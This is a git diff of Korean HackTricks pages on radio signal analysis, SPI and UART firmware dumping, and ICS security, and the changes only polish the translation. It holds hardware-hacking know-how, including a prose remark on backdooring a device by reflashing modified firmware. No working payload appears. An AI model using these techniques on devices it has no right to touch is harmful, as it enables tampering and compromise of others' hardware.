 ![](<../../images/image (1076).png>)
 
 ![](<../../images/image (597).png>)
 
-- **비트를 복구한 후에는 어떤 식으로든 처리해야 할 수 있습니다**. 예를 들어, 맨체스터 부호화에서 up+down은 1 또는 0이 되고 down+up은 다른 하나가 됩니다. 따라서 1과 0의 쌍(업과 다운)은 실제 1 또는 실제 0이 됩니다.
-- 신호가 맨체스터 부호화를 사용하고 있다면(연속으로 0 또는 1이 2개 이상 발견되는 것은 불가능), **프리앰블에서 여러 개의 1 또는 0을 발견할 수 있습니다**!
+- **비트를 복구한 후에는 어떤 방식으로든 처리해야 할 수 있습니다**. 예를 들어, 맨체스터 부호화에서 up+down은 1 또는 0이 되고, down+up은 다른 하나가 됩니다. 따라서 1과 0의 쌍(업과 다운)은 실제 1 또는 실제 0이 됩니다.
+- 신호가 맨체스터 부호화를 사용하고 있다 하더라도(연속으로 0 또는 1이 2개 이상 발견되는 것은 불가능), **프리앰블에서 여러 개의 1 또는 0을 함께 찾을 수 있습니다**!
 
 ### Uncovering modulation type with IQ
 
-신호에 정보를 저장하는 방법은 3가지가 있습니다: **진폭**, **주파수** 또는 **위상**을 변조하는 것입니다.\
-신호를 확인할 때 정보를 저장하는 데 사용되는 방법을 파악하기 위한 다양한 방법이 있지만(아래에서 더 많은 방법을 찾을 수 있음) 좋은 방법 중 하나는 IQ 그래프를 확인하는 것입니다.
+신호에 정보를 저장하는 방법은 3가지가 있습니다: **진폭**, **주파수** 또는 **위상**을 변조합니다.\
+신호를 확인할 때 정보를 저장하는 데 사용되는 방법을 파악하기 위한 다양한 방법이 있지만(아래에서 더 많은 방법을 찾을 수 있음), 좋은 방법 중 하나는 IQ 그래프를 확인하는 것입니다.
 
 ![](<../../images/image (788).png>)
 
 - **AM 감지**: IQ 그래프에 예를 들어 **2개의 원**이 나타나면(아마도 하나는 0이고 다른 하나는 다른 진폭), 이는 AM 신호일 수 있습니다. 이는 IQ 그래프에서 0과 원 사이의 거리가 신호의 진폭이기 때문에 서로 다른 진폭이 사용되는 것을 쉽게 시각화할 수 있습니다.
-- **PM 감지**: 이전 이미지와 같이 서로 관련이 없는 작은 원을 발견하면 이는 위상 변조가 사용되고 있음을 의미할 수 있습니다. 이는 IQ 그래프에서 점과 0,0 사이의 각도가 신호의 위상이기 때문에 4개의 서로 다른 위상이 사용되고 있음을 의미합니다.
+- **PM 감지**: 이전 이미지와 같이 서로 관련이 없는 작은 원을 찾으면 이는 아마도 위상 변조가 사용되고 있음을 의미합니다. 이는 IQ 그래프에서 점과 0,0 사이의 각도가 신호의 위상이기 때문에 4개의 서로 다른 위상이 사용되고 있음을 의미합니다.
 - 정보가 위상이 변경되는 사실에 숨겨져 있고 위상 자체에 숨겨져 있다면, 서로 다른 위상이 명확하게 구분되지 않을 것입니다.
 - **FM 감지**: IQ에는 주파수를 식별하는 필드가 없습니다(중심까지의 거리는 진폭이고 각도는 위상입니다).\
 따라서 FM을 식별하려면 이 그래프에서 **기본적으로 원만 보아야 합니다**.\
-게다가, 다른 주파수는 IQ 그래프에서 **원 주위를 가로지르는 속도 가속**으로 "표현"됩니다(따라서 SysDigger에서 신호를 선택하면 IQ 그래프가 채워지며, 생성된 원에서 가속 또는 방향 변화가 발견되면 이는 FM일 수 있습니다):
+게다가, 다른 주파수는 IQ 그래프에서 **원 주위를 가로지르는 속도 가속**으로 "표현"됩니다(따라서 SysDigger에서 신호를 선택하면 IQ 그래프가 채워지며, 생성된 원에서 가속 또는 방향 변경을 찾으면 이는 FM일 수 있습니다):
 
 ## AM Example
 
@@ -80,7 +80,7 @@ GUI 동작에서 PC가 지원하는 경우 몇 가지 기능을 활성화하는
 
 #### Checking the Histogram
 
-정보가 있는 전체 신호를 **선택**하고 **진폭** 모드 및 **선택**을 선택한 후 **히스토그램**을 클릭할 수 있습니다. 두 개의 명확한 수준만 발견할 수 있습니다.
+정보가 있는 전체 신호를 **선택**하고 **진폭** 모드와 **선택**을 선택한 후 **히스토그램**을 클릭합니다. 두 개의 명확한 수준만 발견할 수 있습니다.
 
 ![](<../../images/image (264).png>)
 
@@ -100,7 +100,7 @@ GUI 동작에서 PC가 지원하는 경우 몇 가지 기능을 활성화하는
 
 #### With one symbol
 
-가장 작은 기호를 선택하여(확실히 1개임을 확인) "Selection freq"를 확인하십시오. 이 경우 1.013kHz(즉, 1kHz)가 됩니다.
+가장 작은 기호를 선택하여(확실히 1개임을 확인) "Selection freq"를 확인합니다. 이 경우 1.013kHz(즉, 1kHz)가 됩니다.
 
 ![](<../../images/image (78).png>)
 
@@ -129,15 +129,15 @@ GUI 동작에서 PC가 지원하는 경우 몇 가지 기능을 활성화하는
 
 ![](<../../images/image (439).png>)
 
-예를 들어 **4개의 서로 다른 진폭 수준**이 있었다면, **기호당 비트 수를 2로 설정**하고 가장 작은 것에서 가장 큰 것까지 선택해야 했습니다.
+예를 들어 **4개의 서로 다른 진폭 수준**이 있었다면, **기호당 비트를 2로 설정**하고 가장 작은 것에서 가장 큰 것까지 선택해야 했을 것입니다.
 
 마지막으로 **줌을 증가시키고** **행 크기를 변경하면** 비트를 볼 수 있습니다(모든 비트를 선택하고 복사하여 모든 비트를 얻을 수 있습니다):
 
 ![](<../../images/image (276).png>)
 
-신호에 기호당 1비트 이상(예: 2비트)이 있는 경우, SigDigger는 **어떤 기호가** 00, 01, 10, 11인지 알 수 없으므로 서로 다른 **회색 음영**을 사용하여 각 기호를 나타냅니다(비트를 복사하면 **0에서 3까지의 숫자**를 사용하므로 이를 처리해야 합니다).
+신호에 기호당 1비트 이상(예: 2비트)이 있는 경우, SigDigger는 **어떤 기호가** 00, 01, 10, 11인지 알 수 있는 방법이 없으므로 서로 다른 **회색 음영**을 사용하여 각 기호를 나타냅니다(비트를 복사하면 **0에서 3까지의 숫자**를 사용하므로 이를 처리해야 합니다).
 
-또한 **부호화**를 사용하여 **맨체스터**와 **up+down**은 **1 또는 0**이 될 수 있으며, down+up은 1 또는 0이 될 수 있습니다. 이러한 경우에는 **얻은 업(1)과 다운(0)**을 처리하여 01 또는 10 쌍을 0 또는 1로 대체해야 합니다.
+또한 **맨체스터**와 같은 **부호화**를 사용하고, **up+down**은 **1 또는 0**이 될 수 있으며, **down+up**은 1 또는 0이 될 수 있습니다. 이러한 경우에는 **얻은 업(1)과 다운(0)**을 처리하여 01 또는 10 쌍을 0 또는 1로 대체해야 합니다.
 
 ## FM Example
 
@@ -151,11 +151,11 @@ FM으로 변조된 정보를 전송하는 신호 예제:
 
 ![](<../../images/image (725).png>)
 
-이전 이미지에서 **2개의 주파수가 사용되고 있음을** 꽤 잘 관찰할 수 있지만, **파형**을 관찰하면 **2개의 서로 다른 주파수를 정확하게 식별하지 못할 수 있습니다**:
+이전 이미지에서 **2개의 주파수가 사용되고 있음을** 꽤 잘 관찰할 수 있지만, **파형**을 관찰하면 **2개의 서로 다른 주파수를 정확하게 식별하지 못할 수도 있습니다**:
 
 ![](<../../images/image (717).png>)
 
-이는 내가 두 주파수에서 신호를 캡처했기 때문에 하나는 대략 다른 하나의 음수입니다:
+이는 내가 두 주파수에서 신호를 캡처했기 때문에 하나는 대략적으로 다른 주파수의 음수입니다:
 
 ![](<../../images/image (942).png>)
 
@@ -171,7 +171,7 @@ FM으로 변조된 정보를 전송하는 신호 예제:
 
 ![](<../../images/image (871).png>)
 
-이 경우 **진폭 히스토그램**을 확인하면 **단 하나의 진폭**만 발견되므로 **AM이 될 수 없습니다**(많은 진폭을 발견하면 신호가 채널을 따라 전력을 잃었을 가능성이 있습니다):
+이 경우 **진폭 히스토그램**을 확인하면 **단 하나의 진폭**만 발견되므로 **AM이 될 수 없습니다**(많은 진폭을 발견하면 신호가 채널을 따라 전력을 잃었기 때문일 수 있습니다):
 
 ![](<../../images/image (817).png>)
 
@@ -183,16 +183,16 @@ FM으로 변조된 정보를 전송하는 신호 예제:
 
 IQ에는 주파수를 식별하는 필드가 없습니다(중심까지의 거리는 진폭이고 각도는 위상입니다).\
 따라서 FM을 식별하려면 이 그래프에서 **기본적으로 원만 보아야 합니다**.\
-게다가, 다른 주파수는 IQ 그래프에서 **원 주위를 가로지르는 속도 가속**으로 "표현"됩니다(따라서 SysDigger에서 신호를 선택하면 IQ 그래프가 채워지며, 생성된 원에서 가속 또는 방향 변화가 발견되면 이는 FM일 수 있습니다):
+게다가, 다른 주파수는 IQ 그래프에서 **원 주위를 가로지르는 속도 가속**으로 "표현"됩니다(따라서 SysDigger에서 신호를 선택하면 IQ 그래프가 채워지며, 생성된 원에서 가속 또는 방향 변경을 찾으면 이는 FM일 수 있습니다):
 
 ![](<../../images/image (81).png>)
 
 ### Get Symbol Rate
 
-기호를 운반하는 주파수를 찾은 후에는 **AM 예제에서 사용된 것과 동일한 기술**을 사용하여 기호 속도를 얻을 수 있습니다.
+기호를 운반하는 주파수를 찾은 후, **AM 예제에서 사용된 것과 동일한 기술**을 사용하여 기호 속도를 얻을 수 있습니다.
 
 ### Get Bits
 
-신호가 주파수로 변조되었음을 **확인한 후** 기호 속도를 찾은 후에는 **AM 예제에서 사용된 것과 동일한 기술**을 사용하여 비트를 얻을 수 있습니다.
+신호가 주파수로 변조되었고 **기호 속도**를 찾은 후, **AM 예제에서 사용된 것과 동일한 기술**을 사용하여 비트를 얻을 수 있습니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/todo/hardware-hacking/spi.md b/src/todo/hardware-hacking/spi.md
index 6dbf13417..5b7856617 100644
--- a/src/todo/hardware-hacking/spi.md
+++ b/src/todo/hardware-hacking/spi.md
@@ -6,7 +6,7 @@
 
 SPI (Serial Peripheral Interface)는 IC(집적 회로) 간의 단거리 통신을 위해 임베디드 시스템에서 사용되는 동기식 직렬 통신 프로토콜입니다. SPI 통신 프로토콜은 클럭 및 칩 선택 신호에 의해 조정되는 마스터-슬레이브 아키텍처를 사용합니다. 마스터-슬레이브 아키텍처는 EEPROM, 센서, 제어 장치 등과 같은 외부 주변 장치를 관리하는 마스터(일반적으로 마이크로프로세서)로 구성되며, 이들은 슬레이브로 간주됩니다.
 
-여러 슬레이브가 마스터에 연결될 수 있지만 슬레이브끼리는 서로 통신할 수 없습니다. 슬레이브는 클럭 및 칩 선택의 두 핀에 의해 관리됩니다. SPI는 동기식 통신 프로토콜이므로 입력 및 출력 핀은 클럭 신호를 따릅니다. 칩 선택은 마스터가 슬레이브를 선택하고 상호작용하는 데 사용됩니다. 칩 선택이 높을 때 슬레이브 장치는 선택되지 않으며, 낮을 때는 칩이 선택되어 마스터가 슬레이브와 상호작용하게 됩니다.
+여러 슬레이브가 마스터에 연결될 수 있지만 슬레이브끼리는 서로 통신할 수 없습니다. 슬레이브는 클럭 및 칩 선택의 두 핀으로 관리됩니다. SPI는 동기식 통신 프로토콜이므로 입력 및 출력 핀은 클럭 신호를 따릅니다. 칩 선택은 마스터가 슬레이브를 선택하고 상호작용하는 데 사용됩니다. 칩 선택이 높을 때 슬레이브 장치는 선택되지 않으며, 낮을 때는 칩이 선택되어 마스터가 슬레이브와 상호작용하게 됩니다.
 
 MOSI (Master Out, Slave In) 및 MISO (Master In, Slave Out)는 데이터 전송 및 수신을 담당합니다. 데이터는 MOSI 핀을 통해 슬레이브 장치로 전송되며, 이때 칩 선택은 낮게 유지됩니다. 입력 데이터는 슬레이브 장치 공급업체의 데이터 시트에 따라 명령, 메모리 주소 또는 데이터가 포함됩니다. 유효한 입력이 있을 경우, MISO 핀은 마스터로 데이터를 전송하는 역할을 합니다. 출력 데이터는 입력이 끝난 다음 클럭 주기에서 정확히 전송됩니다. MISO 핀은 데이터가 완전히 전송되거나 마스터가 칩 선택 핀을 높게 설정할 때까지 데이터를 전송합니다(이 경우 슬레이브는 전송을 중지하고 마스터는 그 이후의 클럭 주기에서 듣지 않습니다).
 
@@ -14,9 +14,9 @@ MOSI (Master Out, Slave In) 및 MISO (Master In, Slave Out)는 데이터 전송
 
 펌웨어 덤프는 펌웨어를 분석하고 그 안의 취약점을 찾는 데 유용할 수 있습니다. 종종 펌웨어는 인터넷에서 사용할 수 없거나 모델 번호, 버전 등과 같은 다양한 요인으로 인해 관련성이 없습니다. 따라서 물리적 장치에서 직접 펌웨어를 추출하는 것이 위협을 탐색하는 데 도움이 될 수 있습니다.
 
-직렬 콘솔을 얻는 것이 유용할 수 있지만, 종종 파일이 읽기 전용인 경우가 있습니다. 이는 다양한 이유로 분석을 제약합니다. 예를 들어, 패키지를 전송하고 수신하는 데 필요한 도구가 펌웨어에 없을 수 있습니다. 따라서 이진 파일을 추출하여 리버스 엔지니어링하는 것은 실현 가능하지 않습니다. 따라서 시스템에 전체 펌웨어를 덤프하고 분석을 위해 이진 파일을 추출하는 것이 매우 유용할 수 있습니다.
+직렬 콘솔을 얻는 것은 유용할 수 있지만, 종종 파일이 읽기 전용인 경우가 있습니다. 이는 다양한 이유로 분석을 제약합니다. 예를 들어, 패키지를 전송하고 수신하는 데 필요한 도구가 펌웨어에 없을 수 있습니다. 따라서 이진 파일을 추출하여 리버스 엔지니어링하는 것은 실현 가능하지 않습니다. 따라서 시스템에 전체 펌웨어를 덤프하고 분석을 위해 이진 파일을 추출하는 것이 매우 유용할 수 있습니다.
 
-또한, 레드 팀 활동 중 장치에 물리적으로 접근할 때 펌웨어를 덤프하면 파일을 수정하거나 악성 파일을 주입한 다음 메모리에 다시 플래시하는 데 도움이 될 수 있으며, 이는 장치에 백도어를 심는 데 유용할 수 있습니다. 따라서 펌웨어 덤프를 통해 잠금 해제할 수 있는 수많은 가능성이 있습니다.
+또한, 레드 팀 활동 중 장치에 물리적으로 접근할 때, 펌웨어를 덤프하면 파일을 수정하거나 악성 파일을 주입한 후 메모리에 다시 플래시하는 데 도움이 될 수 있으며, 이는 장치에 백도어를 심는 데 유용할 수 있습니다. 따라서 펌웨어 덤프를 통해 잠금 해제할 수 있는 수많은 가능성이 있습니다.
 
 ### CH341A EEPROM 프로그래머 및 리더
 
@@ -28,30 +28,30 @@ CH341a 프로그래머와 EEPROM 메모리를 연결하고 장치를 컴퓨터
 
 ![drawing](../../images/connect_wires_ch341a.jpg) ![drawing](../../images/eeprom_plugged_ch341a.jpg)
 
-마지막으로 flashrom, G-Flash (GUI) 등의 소프트웨어를 사용하여 펌웨어를 덤프합니다. G-Flash는 최소한의 GUI 도구로 빠르며 EEPROM을 자동으로 감지합니다. 이는 펌웨어를 신속하게 추출해야 할 때 유용하며, 문서와 많은 조작 없이도 가능합니다.
+마지막으로 flashrom, G-Flash (GUI) 등의 소프트웨어를 사용하여 펌웨어를 덤프합니다. G-Flash는 최소한의 GUI 도구로 빠르며 EEPROM을 자동으로 감지합니다. 이는 펌웨어를 신속하게 추출해야 할 때, 문서와 많은 조작 없이 유용할 수 있습니다.
 
 ![drawing](../../images/connected_status_ch341a.jpg)
 
 펌웨어를 덤프한 후, 이진 파일에 대한 분석을 수행할 수 있습니다. strings, hexdump, xxd, binwalk 등의 도구를 사용하여 펌웨어 및 전체 파일 시스템에 대한 많은 정보를 추출할 수 있습니다.
 
-펌웨어에서 내용을 추출하기 위해 binwalk를 사용할 수 있습니다. Binwalk는 헥스 서명을 분석하고 이진 파일에서 파일을 식별하며 이를 추출할 수 있는 기능을 가지고 있습니다.
+펌웨어에서 내용을 추출하기 위해 binwalk를 사용할 수 있습니다. Binwalk는 헥사 서명을 분석하고 이진 파일에서 파일을 식별하며 이를 추출할 수 있는 기능이 있습니다.
 ```
 binwalk -e <filename>
 ```
 이것은 사용된 도구와 구성에 따라 .bin 또는 .rom일 수 있습니다.
 
 > [!CAUTION]
-> 펌웨어 추출은 섬세한 과정이며 많은 인내가 필요하다는 점에 유의하십시오. 잘못 처리하면 펌웨어가 손상되거나 완전히 지워져 장치를 사용할 수 없게 될 수 있습니다. 펌웨어를 추출하기 전에 특정 장치를 연구하는 것이 좋습니다.
+> 펌웨어 추출은 섬세한 과정이며 많은 인내가 필요합니다. 잘못 다루면 펌웨어가 손상되거나 완전히 지워져 장치가 사용 불가능해질 수 있습니다. 펌웨어를 추출하기 전에 특정 장치를 연구하는 것이 권장됩니다.
 
 ### Bus Pirate + flashrom
 
 ![](<../../images/image (910).png>)
 
-Pirate Bus의 핀 배치가 SPI에 연결하기 위한 **MOSI** 및 **MISO** 핀을 나타내더라도 일부 SPI는 핀을 DI 및 DO로 나타낼 수 있습니다. **MOSI -> DI, MISO -> DO**
+Pirate Bus의 핀 배치가 SPI에 연결할 **MOSI** 및 **MISO** 핀을 나타내더라도 일부 SPI는 핀을 DI 및 DO로 나타낼 수 있습니다. **MOSI -> DI, MISO -> DO**
 
 ![](<../../images/image (360).png>)
 
-Windows 또는 Linux에서 [**`flashrom`**](https://www.flashrom.org/Flashrom) 프로그램을 사용하여 다음과 같이 플래시 메모리의 내용을 덤프할 수 있습니다:
+Windows 또는 Linux에서는 [**`flashrom`**](https://www.flashrom.org/Flashrom) 프로그램을 사용하여 다음과 같이 플래시 메모리의 내용을 덤프할 수 있습니다:
 ```bash
 # In this command we are indicating:
 # -VV Verbose
diff --git a/src/todo/hardware-hacking/uart.md b/src/todo/hardware-hacking/uart.md
index 4dd922545..dc18ce3a5 100644
--- a/src/todo/hardware-hacking/uart.md
+++ b/src/todo/hardware-hacking/uart.md
@@ -8,7 +8,7 @@ UART는 직렬 프로토콜로, 구성 요소 간에 데이터를 한 번에 한
 
 일반적으로 UART가 유휴 상태일 때 라인은 높은 상태(논리 1 값)로 유지됩니다. 그런 다음 데이터 전송의 시작을 신호하기 위해 송신기는 수신기에 시작 비트를 전송하며, 이 동안 신호는 낮은 상태(논리 0 값)로 유지됩니다. 다음으로 송신기는 실제 메시지를 포함하는 5~8개의 데이터 비트를 전송하고, 그 뒤에 선택적 패리티 비트와 하나 또는 두 개의 정지 비트(논리 1 값)를 전송합니다. 오류 검사용으로 사용되는 패리티 비트는 실제로는 거의 보이지 않습니다. 정지 비트(또는 비트)는 전송의 끝을 나타냅니다.
 
-가장 일반적인 구성은 8N1이라고 부릅니다: 8개의 데이터 비트, 패리티 없음, 1개의 정지 비트. 예를 들어, 문자 C 또는 ASCII에서 0x43을 8N1 UART 구성으로 전송하고자 한다면, 다음 비트를 전송합니다: 0(시작 비트); 0, 1, 0, 0, 0, 0, 1, 1(0x43의 이진 값), 그리고 0(정지 비트).
+가장 일반적인 구성은 8N1이라고 부릅니다: 8개의 데이터 비트, 패리티 없음, 1개의 정지 비트. 예를 들어, 문자 C 또는 ASCII에서 0x43을 8N1 UART 구성으로 전송하고자 한다면, 다음 비트를 전송합니다: 0(시작 비트); 0, 1, 0, 0, 0, 0, 1, 1(이진수로 0x43의 값), 그리고 0(정지 비트).
 
 ![](<../../images/image (764).png>)
 
@@ -20,18 +20,18 @@ UART와 통신하기 위한 하드웨어 도구:
 
 ### UART 포트 식별
 
-UART에는 4개의 포트가 있습니다: **TX**(전송), **RX**(수신), **Vcc**(전압), 및 **GND**(접지). PCB에 **`TX`** 및 **`RX`** 문자가 **표기된** 4개의 포트를 찾을 수 있을 것입니다. 그러나 표시가 없다면, **멀티미터** 또는 **로직 분석기**를 사용하여 직접 찾아야 할 수도 있습니다.
+UART에는 4개의 포트가 있습니다: **TX**(전송), **RX**(수신), **Vcc**(전압), 및 **GND**(접지). PCB에 **`TX`** 및 **`RX`** 문자가 **작성된** 4개의 포트를 찾을 수 있을 것입니다. 그러나 표시가 없다면, **멀티미터** 또는 **로직 분석기**를 사용하여 직접 찾아야 할 수도 있습니다.
 
 **멀티미터**와 장치 전원이 꺼진 상태에서:
 
 - **GND** 핀을 식별하려면 **연속성 테스트** 모드를 사용하고, 검은색 리드를 접지에 놓고 빨간색 리드로 테스트하여 멀티미터에서 소리가 날 때까지 테스트합니다. PCB에서 여러 GND 핀을 찾을 수 있으므로 UART에 해당하는 핀을 찾았는지 여부는 확실하지 않을 수 있습니다.
-- **VCC 포트**를 식별하려면 **DC 전압 모드**로 설정하고 20V로 설정합니다. 검은색 프로브를 접지에 놓고 빨간색 프로브를 핀에 놓습니다. 장치를 켭니다. 멀티미터가 3.3V 또는 5V의 일정한 전압을 측정하면 Vcc 핀을 찾은 것입니다. 다른 전압이 측정되면 다른 포트로 다시 시도합니다.
+- **VCC 포트**를 식별하려면 **DC 전압 모드**로 설정하고 20V로 설정합니다. 검은색 프로브를 접지에 놓고 빨간색 프로브를 핀에 놓습니다. 장치를 켭니다. 멀티미터가 3.3V 또는 5V의 일정한 전압을 측정하면 Vcc 핀을 찾은 것입니다. 다른 전압이 나오면 다른 포트로 다시 시도합니다.
 - **TX** **포트**를 식별하려면, **DC 전압 모드**를 20V로 설정하고 검은색 프로브를 접지에 놓고 빨간색 프로브를 핀에 놓고 장치를 켭니다. 전압이 몇 초 동안 변동하다가 Vcc 값으로 안정화되면 TX 포트를 찾은 것입니다. 이는 전원이 켜질 때 일부 디버그 데이터를 전송하기 때문입니다.
 - **RX 포트**는 나머지 3개 포트와 가장 가까운 포트로, 전압 변동이 가장 적고 모든 UART 핀 중에서 가장 낮은 전체 값을 가집니다.
 
-TX와 RX 포트를 혼동해도 아무런 문제가 발생하지 않지만, GND와 VCC 포트를 혼동하면 회로가 손상될 수 있습니다.
+TX와 RX 포트를 혼동해도 아무 일도 일어나지 않지만, GND와 VCC 포트를 혼동하면 회로가 손상될 수 있습니다.
 
-일부 대상 장치에서는 제조업체가 RX 또는 TX 또는 두 개 모두를 비활성화하여 UART 포트를 비활성화합니다. 이 경우 회로 기판의 연결을 추적하고 일부 브레이크아웃 포인트를 찾는 것이 도움이 될 수 있습니다. UART가 감지되지 않고 회로가 끊어졌다는 것을 확인하는 강력한 힌트는 장치 보증을 확인하는 것입니다. 장치가 보증과 함께 배송된 경우, 제조업체는 일부 디버그 인터페이스(이 경우 UART)를 남겨두고, 따라서 UART를 분리했으며 디버깅 중에 다시 연결해야 합니다. 이러한 브레이크아웃 핀은 납땜하거나 점퍼 와이어로 연결할 수 있습니다.
+일부 대상 장치에서는 제조업체가 RX 또는 TX 또는 두 개 모두를 비활성화하여 UART 포트를 비활성화합니다. 이 경우 회로 기판의 연결을 추적하고 일부 브레이크아웃 포인트를 찾는 것이 도움이 될 수 있습니다. UART의 감지가 없고 회로가 끊어졌음을 확인하는 강력한 힌트는 장치 보증을 확인하는 것입니다. 장치가 보증과 함께 배송된 경우, 제조업체는 일부 디버그 인터페이스(이 경우 UART)를 남겨두고, 따라서 UART를 분리했을 것이며 디버깅 중에 다시 연결할 것입니다. 이러한 브레이크아웃 핀은 납땜하거나 점퍼 와이어로 연결할 수 있습니다.
 
 ### UART 전송 속도 식별
 
@@ -62,17 +62,17 @@ minicom -s
 
 구성이 완료되면 `minicom` 명령을 사용하여 UART 콘솔을 시작합니다.
 
-## Arduino UNO R3를 통한 UART (탈착 가능한 Atmel 328p 칩 보드)
+## UART Via Arduino UNO R3 (Removable Atmel 328p Chip Boards)
 
-UART Serial to USB 어댑터를 사용할 수 없는 경우, Arduino UNO R3를 빠른 해킹으로 사용할 수 있습니다. Arduino UNO R3는 일반적으로 어디서나 구할 수 있으므로 많은 시간을 절약할 수 있습니다.
+UART Serial to USB 어댑터가 없는 경우, Arduino UNO R3를 빠른 해킹으로 사용할 수 있습니다. Arduino UNO R3는 일반적으로 어디서나 구할 수 있으므로 많은 시간을 절약할 수 있습니다.
 
-Arduino UNO R3에는 보드 자체에 USB to Serial 어댑터가 내장되어 있습니다. UART 연결을 얻으려면 보드에서 Atmel 328p 마이크로컨트롤러 칩을 분리하기만 하면 됩니다. 이 해킹은 Atmel 328p가 보드에 납땜되지 않은 Arduino UNO R3 변형에서 작동합니다(여기서는 SMD 버전이 사용됨). Arduino의 RX 핀(디지털 핀 0)을 UART 인터페이스의 TX 핀에 연결하고 Arduino의 TX 핀(디지털 핀 1)을 UART 인터페이스의 RX 핀에 연결합니다.
+Arduino UNO R3에는 보드 자체에 USB to Serial 어댑터가 내장되어 있습니다. UART 연결을 얻으려면 Atmel 328p 마이크로컨트롤러 칩을 보드에서 분리하기만 하면 됩니다. 이 해킹은 Atmel 328p가 보드에 납땜되지 않은 Arduino UNO R3 변형에서 작동합니다(여기서는 SMD 버전이 사용됩니다). Arduino의 RX 핀(디지털 핀 0)을 UART 인터페이스의 TX 핀에 연결하고 Arduino의 TX 핀(디지털 핀 1)을 UART 인터페이스의 RX 핀에 연결합니다.
 
 마지막으로, Serial Console을 얻기 위해 Arduino IDE를 사용하는 것이 좋습니다. 메뉴의 `tools` 섹션에서 `Serial Console` 옵션을 선택하고 UART 인터페이스에 따라 baud rate를 설정합니다.
 
 ## Bus Pirate
 
-이 시나리오에서는 프로그램의 모든 출력을 Serial Monitor로 전송하는 Arduino의 UART 통신을 스니핑할 것입니다.
+이 시나리오에서는 Arduino의 UART 통신을 스니핑하여 프로그램의 모든 출력을 Serial Monitor로 전송하는 과정을 살펴봅니다.
 ```bash
 # Check the modes
 UART>m
@@ -146,23 +146,23 @@ waiting a few secs to repeat....
 ```
 ## UART 콘솔을 통한 펌웨어 덤프
 
-UART 콘솔은 런타임 환경에서 기본 펌웨어와 작업할 수 있는 훌륭한 방법을 제공합니다. 그러나 UART 콘솔 접근이 읽기 전용인 경우 많은 제약이 있을 수 있습니다. 많은 임베디드 장치에서 펌웨어는 EEPROM에 저장되고 휘발성 메모리를 가진 프로세서에서 실행됩니다. 따라서 원래 펌웨어가 제조 중 EEPROM 내부에 있기 때문에 펌웨어는 읽기 전용으로 유지되며, 새로운 파일은 휘발성 메모리로 인해 손실될 수 있습니다. 따라서 임베디드 펌웨어 작업 시 펌웨어 덤프는 귀중한 노력입니다.
+UART 콘솔은 런타임 환경에서 기본 펌웨어와 작업할 수 있는 훌륭한 방법을 제공합니다. 그러나 UART 콘솔 접근이 읽기 전용일 경우 많은 제약이 있을 수 있습니다. 많은 임베디드 장치에서 펌웨어는 EEPROM에 저장되고 휘발성 메모리를 가진 프로세서에서 실행됩니다. 따라서 원래 펌웨어가 제조 중 EEPROM 내부에 있기 때문에 펌웨어는 읽기 전용으로 유지되며, 새로운 파일은 휘발성 메모리로 인해 손실될 수 있습니다. 따라서 임베디드 펌웨어 작업 시 펌웨어 덤프는 귀중한 노력입니다.
 
-이를 수행하는 방법은 여러 가지가 있으며, SPI 섹션에서는 다양한 장치를 사용하여 EEPROM에서 직접 펌웨어를 추출하는 방법을 다룹니다. 그러나 물리적 장치와 외부 상호작용을 통한 펌웨어 덤프는 위험할 수 있으므로 먼저 UART를 통해 펌웨어 덤프를 시도하는 것이 좋습니다.
+이를 수행하는 방법은 여러 가지가 있으며, SPI 섹션에서는 다양한 장치를 사용하여 EEPROM에서 직접 펌웨어를 추출하는 방법을 다룹니다. 그러나 물리적 장치와 외부 상호작용을 통한 펌웨어 덤프는 위험할 수 있으므로 먼저 UART를 사용하여 펌웨어를 덤프하는 것을 권장합니다.
 
 UART 콘솔에서 펌웨어를 덤프하려면 먼저 부트로더에 접근해야 합니다. 많은 인기 있는 공급업체는 Linux를 로드하기 위해 uboot(유니버설 부트로더)를 부트로더로 사용합니다. 따라서 uboot에 접근하는 것이 필요합니다.
 
 부트로더에 접근하려면 UART 포트를 컴퓨터에 연결하고 모든 Serial Console 도구를 사용하며 장치의 전원 공급 장치를 분리합니다. 설정이 완료되면 Enter 키를 누르고 유지합니다. 마지막으로 장치에 전원 공급 장치를 연결하고 부팅을 시작합니다.
 
-이렇게 하면 uboot의 로딩이 중단되고 메뉴가 제공됩니다. uboot 명령을 이해하고 도움말 메뉴를 사용하여 목록을 나열하는 것이 좋습니다. 이는 `help` 명령일 수 있습니다. 서로 다른 공급업체가 서로 다른 구성을 사용하므로 각 구성을 개별적으로 이해하는 것이 필요합니다.
+이렇게 하면 uboot의 로딩이 중단되고 메뉴가 제공됩니다. uboot 명령어를 이해하고 도움말 메뉴를 사용하여 목록을 나열하는 것이 권장됩니다. 이는 `help` 명령일 수 있습니다. 서로 다른 공급업체가 서로 다른 구성을 사용하므로 각 구성을 개별적으로 이해하는 것이 필요합니다.
 
 일반적으로 펌웨어를 덤프하는 명령은:
 ```
 md
 ```
-"메모리 덤프"를 의미합니다. 이는 화면에 메모리(EEPROM 내용)를 덤프합니다. 메모리 덤프를 캡처하기 위해 절차를 시작하기 전에 Serial Console 출력을 기록하는 것이 권장됩니다.
+"메모리 덤프"를 의미합니다. 이는 메모리(EEPROM 내용)를 화면에 덤프합니다. 메모리 덤프를 캡처하기 위해 절차를 시작하기 전에 Serial Console 출력을 기록하는 것이 권장됩니다.
 
-마지막으로, 로그 파일에서 모든 불필요한 데이터를 제거하고 파일을 `filename.rom`으로 저장한 다음 binwalk를 사용하여 내용을 추출합니다:
+마지막으로, 로그 파일에서 불필요한 데이터를 모두 제거하고 파일을 `filename.rom`으로 저장한 다음 binwalk를 사용하여 내용을 추출합니다:
 ```
 binwalk -e <filename.rom>
 ```
diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md
index 51325ee9d..ebd404f13 100644
--- a/src/todo/industrial-control-systems-hacking/README.md
+++ b/src/todo/industrial-control-systems-hacking/README.md
@@ -6,7 +6,7 @@
 
 산업 제어 시스템은 국가의 경제 발전에 필수적이기 때문에 어디에나 존재합니다. 그러나 이러한 ICS는 업데이트가 어렵고 이 분야에서의 발전이 적습니다. 따라서 보안 결함을 찾는 것이 일반적입니다. 여기에서 사용되는 대부분의 프로토콜과 표준은 90년대에 개발되었으며 현재의 공격 시나리오에 비해 기능이 훨씬 떨어집니다.
 
-이 시스템을 보호하는 것이 중요해졌습니다. 왜냐하면 이를 손상시키는 데는 많은 비용이 들 수 있으며 최악의 경우 생명까지 위협할 수 있기 때문입니다. 산업 제어 시스템 보안을 이해하려면 내부 구조를 아는 것이 필요합니다.
